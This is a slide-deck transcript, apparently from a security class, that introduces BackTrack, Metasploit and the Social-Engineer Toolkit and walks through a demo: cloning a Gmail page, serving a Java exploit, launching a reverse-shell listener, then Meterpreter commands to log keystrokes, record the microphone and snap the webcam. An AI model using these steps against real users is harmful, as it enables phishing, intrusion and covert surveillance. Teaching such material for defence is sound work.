Presentation is loading. Please wait.

Presentation is loading. Please wait.

Backtrack Metasploit and SET

Similar presentations


Presentation on theme: "Backtrack Metasploit and SET"— Presentation transcript:

1 Backtrack Metasploit and SET

2 BackTrack A Linux distribution designed for penetration testing, aka "ethical hacking" Many, many tools for hacking into any type of system, wireless or wired A huge library of drivers and support routines Backtrack 4 is based on Ubuntu Linux

3

4 Downloads http://www.backtrack-linux.org
Available as a bootable DVD or a pre-installed virtual machine (VM) The DVD can be used for computer forensics, but Raptor is better for that The VM is best for most classroom demonstrations and projects

5 BackTrack Gotchas You need to log in to start it
User name: root Password: toor The graphical desktop does not start by default # startx

6 BackTrack Gotchas Networking is not started by default
Because you may be trying to conceal your presence To start networking: # /etc/init.d/networking start To renew a DHCP address # dhclient

7 Metasploit

8 Metasploit Framework Makes it easy to rapidly add new attacks
Attacks are often added before patches exist, creating "Zero-Day" attacks I typically assign several zero-day attacks per semester now as homework It's not supposed to work this way; cyberspace is really dangerous these days

9 Cross-platform Metasploit runs on Windows, Linux, or Unix
But the Windows version doesn't have all the new attacks Installing it on Linux can be frustrating because it needs libraries and drivers

10 The Solution Backtrack contains Metasploit, with all the required support modules included This saves students many hours

11 SET Social-Engineer Toolkit

12

13 SET uses Metasploit There is a "social engineering" aspect in most hacking Tricking a user into making a mistake, that lets you in Clicking a link Ignoring an error message Opening an attachment Etc.

14 Today's Attack Target: Win 7 Vuln: Java 0-Day

15 Evil Web Server Attacker: Evil Web Server with Cloned Gmail Page
Java Exploit Code Added to Web Page Target Using Gmail

16 DEMO

17 Dave Kennedy & Kevin Mitnick Made this Video

18 Preparation Download Backtrack 4 R 2 Virtual Machine
Run it in VMware Workstation Get it networking to the Internet and the target—"Bridged" is best

19 Commands Enter option 2: Website Attack Vectors
cd /pentest/exploits/SET ./set Enter option 2: Website Attack Vectors Enter option 1: The Java Attack Method Enter option 2: Site Cloner Enter url It asks you "What payload do you want to generate:" and lists 11 choices Press Enter for default It shows a list of 16 encodings to try and bypass AV. It asks you to "Enter the PORT of the listener (enter for default): It asks you whether you want to create a Linux.OSX reverse_tcp payload. Enter no It now shows blue text saying: [*] Launching MSF Listener... [*] This may take a few to load MSF... Wait... When it's done, you will see a whole screen scroll by as Metasploit launches, ending with this message: msf auxiliary(smb) >

20 On the Target Open a Web browser and go to the Metasploit IP address
Works on IE, Firefox, and Chrome User will see this warning box Studies show that users almost always just click past those warning boxes

21 GAME OVER The target is now owned. We can Capture screenshots
Capture keystrokes Turn on the microphone and listen Turn on the webcam and take photo Steal password hashes Etc.

22 Fun & Games To remotely control the target: Commands to try:
sessions -i 1 Commands to try: screenshot keyscan_start keyscan_stop record_mic 10 webcam_list webcam_snap 1

23 Protecting Yourself

24 The Usual Stuff This stuff is all helpful
Get Antivirus, like Microsoft Security Essentials Install patches (when they exist) Get a Mac Keep image-based backups so you can recover after an infection But none of it can really save you

25 Attack > Defense Even corporate desktop computers are infected
The Chinese got into Google and >30 other huge companies last year Don't imagine you are immune


Download ppt "Backtrack Metasploit and SET"

Similar presentations


Ads by Google